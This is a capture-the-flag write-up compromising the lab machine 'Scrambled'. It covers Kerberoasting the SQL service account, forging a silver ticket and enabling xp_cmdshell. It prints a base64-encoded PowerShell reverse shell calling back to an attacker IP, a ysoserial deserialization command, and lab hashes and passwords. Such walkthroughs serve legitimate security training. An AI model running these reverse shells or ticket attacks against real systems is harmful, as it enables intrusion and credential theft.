Scrambled machine is an intentionally vulnerable machine with Windows operating system among reitred machines. It is expected to obtain user and root flags using these vulnerabilities.
We scan the network with nmap to recognize the target machine.
Classic Scan
Full Port Scan
As a result of the port scan, we detected that we are facing an AD machine and scrm.local DC1.scrm.local DC.scrm.local DC.scrm.local domains. Here we provided enumeration over the ports. (53, 135, 445, 139, 389 ) we did not find any information from these ports.
We provide enumeration on port 80.
We looked in webanalayzer from developer mode and scanned for hidden files and directories with gobuster and did not find any valuable information
I provide enuemeration from the web interface, there is a remarkable part in the IT services section,
I note that NTLM is off and continue.
In the Resoruce section we go in order;
Contacting IT support
Here I get the information “0866”, “suport”, “ksimpson” can be username or password.
New User Account;
There is a forum in it, it doesn’t work (we went and looked with burpsuite)
Report a problem with the sales orders app
If an error is received in the application, it is told to run the debug command, there we see that the connection to port 4411 is provided.
Request a password reset
Here it is said that the requested users’ passwords are reset and that the username and password are the same.
Here we have identified the username and we are looking for the username in kerberos to see if there is another username.
We found two users and we are doing a bruteforce scan to see if the usernmae and passowrd information of these users are the same
We’ve identified user Ksimpson as having the same password and username.
Since NTLM is disabled here we will not use most standard tools.
We could not connect to smb using smbclient and crackmapexec. We will try to connect using the smbclient tool from Impact tools.
smbclient.py -k scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip dc1.scrm.local
We connected successfully but we don’t have access to any aana except the public sharing area.
Network Security Changes.pdf
We encounter the file, we pull it to our machine with the get command and examine it
Nothing looks interesting in the pdf file. Here it is said that NTLM is disabled due to NTLM relay attack and only kerberos is used. It is also stated that the HR department has access to the SQL database.
Since we cannot access the server using NTLM, we need to create a Ticket Granting Ticket (TGT) for ksimpson. This means we can use kerberos authentication with other Impacket tools.
We get the ksimpson.ccache tikcet using getTGT.py
Now that we have the TGT, we can request ST/TGS (Service Ticket / Ticket Grantign Service) from the KDC (Key Distribution Center) if we can find the SPN (Servce Principat Name) of the user. A valid TGt and an existing SPN are required to request ST from KDC. If the SPN is registered for the domain user, the ST is encrypted with the NT ash of the user’s account, so once the ST is obtained we can crack it on our machine. This attack (kerberosting) would work if the account uses a weak password.
Obtaining SPN and ST/TGS
We can request a ticket using the GetUserSPNs script. Service will try to find Principal Names.
impacket-GetUserSPNs -request -dc-ip dc1.scrm.local scrm.local/ksimpson -k -no-pass
(If we specify IP instead of FQDN, an error may occur in the script)
-k : uses this file to pass the cache
-no-pass: sets the program to send tickets instead of passwords.
Here
GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -request -k
Impacket v0.10.1.dev1+20220720.103933.3c6713e – Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping…
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 16:32:02.351452 2022-09-27 20:50:47.384025
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 16:32:02.351452 2022-09-27 20:50:47.384025
[-] CCache file is not found. Skipping…
$krb5tgs$23$sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc$7d0427e0f264b8353b6d698a94ebbdd0$86afd2b41b0d6d97163c57a8d83e1a865d4deecb929ab11c245d7f1e6be9b4ec98497919d5c0f534da9dc41835c30d93bc49a80c69932cba1bb4c7191fc02a235d5ba87af6000d23ac85ab08ce57bec96da2b781f64bed0614a5ab289632ede3681612a7b6cc136191f7591842bed6064d29c8f53db4eb706948d0b33a7f36fdbd260c32f88f8be43074b2224fe85bb2db48c01db3a93e6f0896875efe82f8959303903ca7387a9035f6501ade7c473f8baa225beaf6a7e7d16c266611527a1c44a6368b4186c1e5787d2a53b362f7d67acf75737579651be6edb47d7f4c9be5321b7d2e06ee7193cde699b414db3b633e7982cb183a0fb83ea545af29d23710ecb2d565e0fe8f6b53ba2d714fe68071d32de0ee4f20e10a6c3ff8e5ee8c05e2709e81685dcf7f7bddda4e2c42d0ceef4e72c395b1db22bb5f7915b3135451ab8f0f1e748e6b281dc66dc44369131479f2d1f605243c0c080827e0d972a40b62b9052f288b9a506dbeb578f585bb0ce53514f567cadcdb39337d261c446bff419d693d0e51a04e4af3069b25565c514b845ad4af73d0a280f4408da2d4567a249013eec40359fc2e111db00e8bd7dcbd28d05ee429104f0e8a68882d319dfddf3b729825eb0fca0fba421bac9d8a23978161e4b04a79ec604f06079794b893e9b6afccf667f2f9223e353bdf60aac4a0e953ab05a88c3cec30aa55f87bc967d7bebfd5b0183b376ebc8529a0ae33890210ce34c6a72a9bc65064fb69241f7f59ec67afa7f02dd1d13c61578b928d889f2d85ffc06fd63b93e0426ecc25d979db5034e4b7ec8b33f310d5c35ad52d93214fa7cabe0e3d29e22101c64c71ecb067e709b5f9925a144be374b73cbf465dbf9ca789eaa22f29a4a8996799407ed00374ef5800cf3a82c2a65c4f96a63c56853238c47afa6b7ef88beb57e73b90d080b801c2be1c8da31bda26b086f65168b64b765e36fcc7c027a43a9b0fa5ce0e3f746e9fe6f129e9e14ca7ddc8d9367808d93c1e179220f9aa236fc309f76a9dfd125b6e2a8a9c4eac7a01e10c9de636f5fda0841d4cfe1f55e62b4f4f94145cf5e42cee78cb878d619d62c19ce691edc6e5c3074f263f311daa8b8eb128018397086fed0fa43976a6330b637aa7301f10ca1d2fa766f5a9380088e3489e7b653591ed097c1d47154ef8c5899d6663cc1a8464e98979910e4f6ae66c4de87dd9ffac3701946a147bf5eb40109ec736494298ce53fc102fd0ea1fefb1dc252acb07de1eef1b869d23582234abb8e55433224648f6ce6440ae46ddc9f5edd2dcae6ad16358456852fcd4530de86a457b07bf17eeee77887651f1723cf76b04f6aa357a5529ff0df3e5a25b56216354710efa81654ac922d2447e48194d0100a81152c1926ce3353ef557d3637c733c63915fab0fd8b20f3c9d840c8ae5
We’ve detected it.
He’s trying to break it with john
Here we have cracked the password to “Pegasus60”.
These credentials don’t directly give us access to anything new, but since this is the account running the SQL service and we have its password, we can perform a silver ticket attack to make the SQL service think that we are on the target domain administrator.
We need three things to perform a silver ticket attack against the SQL service;
1- NTLM hash of the password of the SqlSvc account
2- Domain SID
3- SPN used by SqlSvc account
Obtaining ntlm hash is simple we can also do it with onlien tools
B999A16500B87D17EC7F2E2A68778F05
I use the getpac.py tool to get the domain SID
Domain SID: S-1-5-21-2743207045-1827831105-2542523200
I detected the remaining SON using the GetUserSPNs.py tool.
MSSQLSvc/dc1.scrm.local:1433
Now it’s time to create a silver ticket and I will use ticketer.py to create it
I created our Bruada ticket
Let’s try to connect to sql using this ticket.
We have successfully connected here and now it is time to provide enumeration.
We have detected the credentials of the MiscSvc user.
Let’s see if we can activate xp_cmdshell inside
After enabling
We have seen that we can run the command here, let’s give ourselves powershell and revershell
Here we have our shell.
The shell authorization here is very limited and is on the scrm\sqlsvc user.
We can’t go anywhere here and we can’t find any files. We know the credentials of the MiscSvc user, so we will log in from the MiscSvc user.
Now first I define the credentialb information
$pswd = ConvertTo-SecureString “ScrambledEggs9900” -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential(‘Scrm\MiscSvc’, $pswd)
Then I can ask it to give me revershell with this $cred
(I create revershelli from https://www.revshells.com/)
Invoke-Command -Computer dc1 -ScriptBlock { powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ACIALAA0ADcAMgAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==} -Credential
$cred
It should be noted here that we write the credential information in the last part
And I’m listening from a different terminal
We have obtained shell from user scrm\miscsvc. We can obtain theuser flag via Desktop.
We got the user flag and here we can access the administartor part but we cannot see the files.
Therefore I will provide local enumeration.
I found two interesting files in “C:\Shares\IT\Apps\Sales Order Client\”.
We pull these files to our local machine for deeper analysis
Whatever we did here, we couldn’t get the file. Here we will use the impacket tool smbclient
Here we pulled the files
I’m analyzing it with the dnSpy tool
Looking at the source code, we can see that if the username used is scrmdev, the application does not check valid credentials and works with the 4411 protocol.
Let’s look at 4411
We understand that we need to enter a command etc. We made a couple of attempts without success.
When we examine the source code a little more
We use this syntax when we encounter sytanx like LIST_ORDERS and UPLOAD_ORDER.
List_order
The output looks like base64 code. We tried to decode it and got no meaningful solution
Uload_order
He wants something to be added.
Since Upload_order is a .NET application, I think it should be a .NET command, let’s do a Google search
I come across the ysoserial.exe tool.
I’m doing some research on how to use it
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c “command”
I could use it as we will ask nc64.exe to give us revershell
1 gave the command
2 also gave us a printout
Now let’s give the output to port 4411 and listen to it
This way we got shell on the system user
This is how we got the root flag.